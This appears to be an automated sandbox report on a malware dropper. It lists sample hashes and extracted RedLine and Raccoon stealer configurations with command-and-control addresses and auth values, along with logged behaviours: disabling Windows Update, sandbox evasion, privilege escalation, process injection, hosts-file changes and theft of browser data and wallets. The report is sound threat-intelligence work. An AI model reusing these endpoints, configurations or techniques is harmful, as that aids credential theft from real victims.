Analysis
max time kernel: 149s
max time network: 151s
platform: windows10-1703_x64
resource: win10-20220718-en
resource tags: arch:x64, arch:x86, image:win10-20220718-en, locale:en-us, os:windows10-1703-x64, system
submitted: 08-08-2022 17:29
Static task: static1
Behavioral task: behavioral1
Sample: 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
Resource: win10-20220718-en

General
Target: 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
Size: 860KB
MD5: 8f8d654c2fa15bb497f14db0bd2d00a1
SHA1: 432a7601bc0607257a956e86f39003eb32eb7334
SHA256: 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6
SHA512: 7a505ec7e96414fe8b972f87cb96e661122df222a44476f1ab3f585e19ad7d698484c0d39a6ff2433fbbe718305c1dad14ddb9a643b36bf844896038a4fb42bd
Malware Config
Extracted: redline | nam3 | C2 103.89.90.61:18728 | auth_value 64b900120bbceaa6a9c60e9079492895
Extracted: redline | 4 | C2 31.41.244.134:11643 | auth_value a516b2d034ecd34338f12b50347fbd92
Extracted: redline | @tag12312341 | C2 62.204.41.144:14096 | auth_value 71466795417275fac01979e57016e277
Extracted: raccoon | afb5c633c4650f69312baef49db9dfa4 | C2 http://77.73.132.74
Extracted: raccoon | f0c8034c83808635df0d9d8726d1bfd6 | C2 http://45.95.11.158/
Extracted: redline | 5076357887 | C2 195.54.170.157:16525 | auth_value 0dfaff60271d374d0c206d19883e06f3
Extracted: redline | alfa | C2 46.175.148.142:32178 | auth_value 5f6c4b42c0bce31d7557ce1726a401c5
Signatures

Modifies security service 2 TTPs 5 IoCs
Processes:
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe

Raccoon Stealer payload 5 IoCs
Processes:
resource | yara_rule
behavioral1/memory/4768-600-0x0000000003090000-0x00000000030A6000-memory.dmp | family_raccoon
behavioral1/memory/4768-603-0x0000000000400000-0x0000000000482000-memory.dmp | family_raccoon
behavioral1/memory/5008-676-0x0000000000400000-0x000000000062B000-memory.dmp | family_raccoon
behavioral1/memory/5008-672-0x0000000000030000-0x000000000003F000-memory.dmp | family_raccoon
behavioral1/memory/5008-721-0x0000000000400000-0x000000000062B000-memory.dmp | family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload 15 IoCs
Processes:
resource | yara_rule
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe | family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe | family_redline
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe | family_redline
C:\Program Files (x86)\Company\NewProduct\safert44.exe | family_redline
behavioral1/memory/4676-459-0x0000000000F30000-0x0000000000F74000-memory.dmp | family_redline
behavioral1/memory/4720-461-0x0000000000280000-0x00000000002C4000-memory.dmp | family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe | family_redline
C:\Program Files (x86)\Company\NewProduct\tag.exe | family_redline
behavioral1/memory/4196-639-0x0000000000B10000-0x0000000000B30000-memory.dmp | family_redline
C:\Program Files (x86)\Company\NewProduct\jshainx.exe | family_redline
C:\Program Files (x86)\Company\NewProduct\jshainx.exe | family_redline
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe | family_redline
behavioral1/memory/4868-771-0x0000000000380000-0x00000000003A0000-memory.dmp | family_redline
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe | family_redline
behavioral1/memory/4112-837-0x0000000000460000-0x0000000000480000-memory.dmp | family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 4868 created 3660 | 4868 | WerFault.exe | DllHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
Processes:
description | pid | process | target process
PID 5068 created 548 | 5068 | powershell.EXE | winlogon.exe
PID 4140 created 3660 | 4140 | svchost.exe | DllHost.exe
PID 4140 created 1912 | 4140 | svchost.exe | DllHost.exe
PID 5972 created 548 | 5972 | powershell.EXE | winlogon.exe
PID 5972 created 548 | 5972 | powershell.EXE | winlogon.exe
PID 4140 created 3660 | 4140 | svchost.exe | DllHost.exe

Enumerates VirtualBox DLL files 2 TTPs 20 IoCs
Processes:
description | ioc | process
File opened (read-only) | C:\windows\System32\vboxoglarrayspu.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxhook.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxoglarrayspu.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxoglerrorspu.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxoglpackspu.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxdisp.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxhook.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxoglerrorspu.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxmrxnp.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxoglfeedbackspu.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxoglpassthroughspu.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxmrxnp.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxoglcrutil.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxoglpackspu.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxdisp.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxogl.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxoglcrutil.dll | update.exe
File opened (read-only) | C:\windows\System32\vboxogl.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxoglfeedbackspu.dll | svchost.exe
File opened (read-only) | C:\windows\System32\vboxoglpassthroughspu.dll | svchost.exe

Looks for VirtualBox drivers on disk 2 TTPs 8 IoCs
Processes:
description | ioc | process
File opened (read-only) | C:\windows\System32\Drivers\VBoxGuest.sys | update.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxSF.sys | update.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxVideo.sys | update.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxMouse.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxGuest.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxSF.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxVideo.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\VBoxMouse.sys | update.exe

Looks for VirtualBox executables on disk 2 TTPs 6 IoCs
Processes:
description | ioc | process
File opened (read-only) | C:\windows\System32\vboxtray.exe | update.exe
File opened (read-only) | C:\windows\System32\VBoxControl.exe | update.exe
File opened (read-only) | C:\windows\System32\vboxservice.exe | svchost.exe
File opened (read-only) | C:\windows\System32\vboxtray.exe | svchost.exe
File opened (read-only) | C:\windows\System32\VBoxControl.exe | svchost.exe
File opened (read-only) | C:\windows\System32\vboxservice.exe | update.exe

Downloads MZ/PE file

Drops file in Drivers directory 2 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe

Executes dropped EXE 15 IoCs
Processes:
pid | process
4676 | namdoitntn.exe
4688 | real.exe
4720 | safert44.exe
4768 | kukurzka9000.exe
5008 | F0geI.exe
4196 | tag.exe
4868 | jshainx.exe
4112 | MouseAtHome.exe
6068 | EU1.exe
4832 | WindowsDefender.exe
5220 | Windows.exe
5796 | Windows Defender.exe
6084 | svchost.exe
6124 | update.exe
4676 | updater.exe

Looks for VMWare drivers on disk 2 TTPs 6 IoCs
Processes:
description | ioc | process
File opened (read-only) | C:\windows\System32\Drivers\vmusbmouse.sys | update.exe
File opened (read-only) | C:\windows\System32\Drivers\Vmmouse.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\vmci.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\vmusbmouse.sys | svchost.exe
File opened (read-only) | C:\windows\System32\Drivers\Vmmouse.sys | update.exe
File opened (read-only) | C:\windows\System32\Drivers\vmci.sys | update.exe

Possible privilege escalation attempt 4 IoCs
Processes:
pid | process
4832 | takeown.exe
5132 | icacls.exe
5040 | takeown.exe
6380 | icacls.exe

Stops running service(s) 3 TTPs

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\Windows.exe | upx
behavioral1/memory/5220-1053-0x0000000000400000-0x0000000000736000-memory.dmp | upx
behavioral1/memory/5220-1138-0x0000000000400000-0x0000000000736000-memory.dmp | upx
C:\Users\Admin\AppData\Local\svchost.exe | upx
C:\Users\Admin\AppData\Local\svchost.exe | upx
behavioral1/memory/6084-1161-0x00007FF6063B0000-0x00007FF60672B000-memory.dmp | upx
C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe | upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Control Panel\International\Geo\Nation | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe

Drops startup file 1 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | update.exe

Modifies file permissions 1 TTPs 4 IoCs
Processes:
pid | process
6380 | icacls.exe
4832 | takeown.exe
5132 | icacls.exe
5040 | takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Drops file in System32 directory 7 IoCs
Processes:
description | ioc | process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log | conhost.exe

Suspicious use of SetThreadContext 4 IoCs
Processes:
description | pid | process | target process
PID 4196 set thread context of 5572 | 4196 | conhost.exe | conhost.exe
PID 5068 set thread context of 5448 | 5068 | powershell.EXE | dllhost.exe
PID 5972 set thread context of 6728 | 5972 | powershell.EXE | dllhost.exe
PID 2112 set thread context of 4772 | 2112 | conhost.exe | dialer.exe

Drops file in Program Files directory 13 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Program Files (x86)\Company\NewProduct\real.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\tag.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\jshainx.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\EU1.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File created | C:\Program Files\Google\Chrome\Application\launcher.exe | Windows.exe
File created | C:\Program Files\Defender\updater.exe | powershell.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\safert44.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files (x86)\Company\NewProduct\F0geI.exe | 598149dc5b3ce4f2d74fba63f24dfefe4d89c9ac773c5ecc202561d6c7329bc6.exe
File opened for modification | C:\Program Files\Defender\updater.exe | powershell.exe
File created | C:\Program Files\Google\Libs\WR64.sys | conhost.exe

Drops file in Windows directory 14 IoCs
Processes:
description | ioc | process
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File created | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\Tasks\dialersvc32.job | conhost.exe
File opened for modification | C:\Windows\Tasks\dialersvc64.job | conhost.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | MicrosoftEdgeCP.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid | process
4892 | sc.exe
5644 | sc.exe
2192 | sc.exe
7056 | sc.exe
6108 | sc.exe
6148 | sc.exe
4600 | sc.exe
5796 | sc.exe
5220 | sc.exe
4876 | sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 4 IoCs
Processes:
pid | pid_target | process | target process
5276 | 4688 | WerFault.exe | real.exe
6196 | 3660 | WerFault.exe | DllHost.exe
6284 | 1912 | WerFault.exe | DllHost.exe
4868 | 3660 | WerFault.exe | DllHost.exe

Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | real.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | real.exe

Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs
Modifies registry class 64 IoCs
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created 
\REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) 
\REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\Certificates\83DA05A9886F7658BE = [DER certificate blob omitted] MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 2bc776549d9ad801 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = df9e50355dabd801 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 309e8b9f8fabd801 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1278860188-1450369398-39028496-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 5376 reg.exe 2644 reg.exe 5056 reg.exe 4352 reg.exe 5440 reg.exe 6176 reg.exe 6312 reg.exe 6512 reg.exe 5324 reg.exe 4988 reg.exe 3140 reg.exe 5848 reg.exe 6136 reg.exe 6256 reg.exe 6552 reg.exe 5184 reg.exe 3336 reg.exe 1588 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
real.exetag.exesafert44.exejshainx.exeMouseAtHome.exenamdoitntn.exeWindows.exepowershell.exepowershell.exesvchost.exepowershell.execonhost.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepid process 4688 real.exe 4688 real.exe 4196 tag.exe 4196 tag.exe 4720 safert44.exe 4720 safert44.exe 4868 jshainx.exe 4868 jshainx.exe 4112 MouseAtHome.exe 4112 MouseAtHome.exe 4676 namdoitntn.exe 4676 namdoitntn.exe 5220 Windows.exe 5220 Windows.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 4752 powershell.exe 5428 powershell.exe 5428 powershell.exe 5428 powershell.exe 6084 svchost.exe 6084 svchost.exe 5428 powershell.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 5348 powershell.exe 4196 conhost.exe 4196 conhost.exe 4752 powershell.exe 4752 powershell.exe 5068 powershell.EXE 5068 powershell.EXE 4752 powershell.exe 5068 powershell.EXE 5068 powershell.EXE 4752 powershell.exe 5068 powershell.EXE 5972 powershell.EXE 5972 powershell.EXE 5448 dllhost.exe 5448 dllhost.exe 5972 powershell.EXE 5972 powershell.EXE 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe 5448 dllhost.exe -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
MicrosoftEdgeCP.exepid process 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe 1336 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exetag.exesafert44.exejshainx.exeMouseAtHome.exenamdoitntn.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 2800 MicrosoftEdge.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 3216 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5484 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4196 tag.exe Token: SeDebugPrivilege 4720 safert44.exe Token: SeDebugPrivilege 4868 jshainx.exe Token: SeDebugPrivilege 4112 MouseAtHome.exe Token: SeDebugPrivilege 4676 namdoitntn.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeIncreaseQuotaPrivilege 5428 powershell.exe Token: SeSecurityPrivilege 5428 powershell.exe Token: SeTakeOwnershipPrivilege 5428 powershell.exe Token: SeLoadDriverPrivilege 5428 powershell.exe Token: SeSystemProfilePrivilege 5428 powershell.exe Token: SeSystemtimePrivilege 5428 powershell.exe Token: SeProfSingleProcessPrivilege 5428 powershell.exe Token: SeIncBasePriorityPrivilege 5428 powershell.exe Token: SeCreatePagefilePrivilege 5428 powershell.exe Token: SeBackupPrivilege 5428 powershell.exe Token: SeRestorePrivilege 5428 powershell.exe Token: SeShutdownPrivilege 5428 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeSystemEnvironmentPrivilege 5428 powershell.exe Token: SeRemoteShutdownPrivilege 5428 powershell.exe Token: SeUndockPrivilege 5428 powershell.exe Token: SeManageVolumePrivilege 5428 powershell.exe Token: 33 5428 powershell.exe Token: 34 5428 powershell.exe Token: 35 5428 powershell.exe Token: 36 5428 powershell.exe Token: SeDebugPrivilege 5348 powershell.exe 
Token: SeIncreaseQuotaPrivilege 5348 powershell.exe Token: SeSecurityPrivilege 5348 powershell.exe Token: SeTakeOwnershipPrivilege 5348 powershell.exe Token: SeLoadDriverPrivilege 5348 powershell.exe Token: SeSystemProfilePrivilege 5348 powershell.exe Token: SeSystemtimePrivilege 5348 powershell.exe Token: SeProfSingleProcessPrivilege 5348 powershell.exe Token: SeIncBasePriorityPrivilege 5348 powershell.exe Token: SeCreatePagefilePrivilege 5348 powershell.exe Token: SeBackupPrivilege 5348 powershell.exe Token: SeRestorePrivilege 5348 powershell.exe Token: SeShutdownPrivilege 5348 powershell.exe Token: SeDebugPrivilege 5348 powershell.exe Token: SeSystemEnvironmentPrivilege 5348 powershell.exe Token: SeRemoteShutdownPrivilege 5348 powershell.exe Token: SeUndockPrivilege 5348 powershell.exe Token: SeManageVolumePrivilege 5348 powershell.exe Token: 33 5348 powershell.exe Token: 34 5348 powershell.exe Token: 35 5348 powershell.exe Token: 36 5348 powershell.exe Token: SeShutdownPrivilege 4900 powercfg.exe Token: SeCreatePagefilePrivilege 4900 powercfg.exe Token: SeShutdownPrivilege 5420 powercfg.exe Token: SeCreatePagefilePrivilege 5420 powercfg.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
dwm.exepid process 992 dwm.exe 992 dwm.exe -
